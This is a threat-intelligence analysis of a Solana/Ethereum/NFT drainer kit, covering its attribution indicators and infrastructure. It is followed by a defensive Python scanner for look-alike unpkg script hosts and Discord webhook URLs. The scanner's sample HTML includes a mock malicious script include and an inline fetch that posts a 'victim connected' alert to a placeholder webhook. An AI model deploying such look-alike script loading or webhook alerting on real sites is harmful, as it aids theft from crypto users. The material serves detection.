Analysis of Solana, Ethereum and NFT drainers served from wl-now[.]com. The kit uses a fake unpkg domain to serve the drainer JavaScript and Discord webhooks to alert the operator in real time when a victim connects. It shows a relation to presaless[.]com and to the drainer kit sold via cryptokens[.]sellix[.]io (previously tokens404[.]com).
The operator is likely a Chinese-speaking threat actor (or actors), based on several indicators:
- The receiver-wallet configuration was left with its default field name, 钱包, which translates to "wallet".
- The Discord webhook was given the username "houmen", the pinyin romanization of 后门, which translates to "backdoor". Its avatar shows a Chinese schoolgirl (cdn.discordapp.com/avatars/979351082012659755/b791e87ac09e0fcd70bef0721b074513.png, traced back to facebook.com/JK照片-100190912056316/photos/pcb.100195085389232/100195032055904/).
- The drainers were hosted on a server in HK/China (Cloudie Limited [AS55933], 103.105.23[.]18).
- The fake unpkg domain serves a default page in Chinese.
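The two delivery mechanisms described above (a look-alike unpkg host serving the drainer script, and a Discord webhook used as the alert channel) are both visible in page source. The following scanner is an added example written for this page, not code from the original write-up or from the drainer kit: it flags `<script src>` URLs whose host contains "unpkg" but is not the real unpkg.com, and extracts Discord webhook URLs while masking the secret token. The sample HTML, the host `cdn-unpkg.example`, and the webhook ID/token are all constructed placeholders, since the page does not publish the fake unpkg domain or the webhook itself.

```python
"""Scan page HTML for two drainer indicators: unpkg look-alike script hosts and Discord webhook URLs.

Added example, not the original analysis's tooling. The sample input and all hostnames,
IDs and tokens below are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# The only legitimate unpkg host. Anything else containing "unpkg" is treated as a look-alike.
REAL_UNPKG_HOSTS = {"unpkg.com"}

# <script ... src="..."> attributes (single or double quotes).
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.I)

# Discord webhook URL layout: https://discord.com/api/webhooks/<id>/<token>
# (discordapp.com and the ptb/canary subdomains are valid alternates).
DISCORD_WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_\-]+)"
)


def is_fake_unpkg(src: str) -> bool:
    """True when the script's host mimics unpkg but is not unpkg.com itself."""
    if src.startswith("//"):  # scheme-relative URL, common in injected tags
        src = "https:" + src
    host = (urlparse(src).hostname or "").lower()
    # Substring heuristic only: it catches typosquats and subdomain tricks such as
    # unpkg.com.evil.example, not a drainer host with an unrelated name.
    return "unpkg" in host and host not in REAL_UNPKG_HOSTS


def find_discord_webhooks(text: str) -> list[tuple[str, str]]:
    """Return (webhook_id, masked_token) pairs; the token is a secret, so never log it whole."""
    return [(wid, tok[:6] + "...") for wid, tok in DISCORD_WEBHOOK_RE.findall(text)]


def scan_html(html: str) -> dict:
    """Collect both indicator types from a page's HTML (inline scripts included)."""
    return {
        "fake_unpkg_scripts": [s for s in SCRIPT_SRC_RE.findall(html) if is_fake_unpkg(s)],
        "discord_webhooks": find_discord_webhooks(html),
    }


# Constructed sample page: one real unpkg include, one look-alike include, and an inline
# alert call to a (fake) Discord webhook of the kind the drainer uses for real-time alerts.
SAMPLE_HTML = """<html><head>
<script src="https://unpkg.com/react@18/umd/react.production.min.js"></script>
<script src="//cdn-unpkg.example/@solana/web3.js@1.87.6/lib/index.iife.min.js"></script>
</head><body>
<script>
const HOOK = "https://discord.com/api/webhooks/123456789012345678/AbCdEfGhIjKlMnOpQrStUvWxYz0123456789";
fetch(HOOK, {method: "POST", body: JSON.stringify({content: "victim connected"})});
</script>
</body></html>"""

if __name__ == "__main__":
    for key, hits in scan_html(SAMPLE_HTML).items():
        print(key, hits)
```

Run it against saved page source or against the fetched drainer JavaScript itself; the webhook is just as likely to sit in the external script as in the HTML, so `find_discord_webhooks` accepts any text.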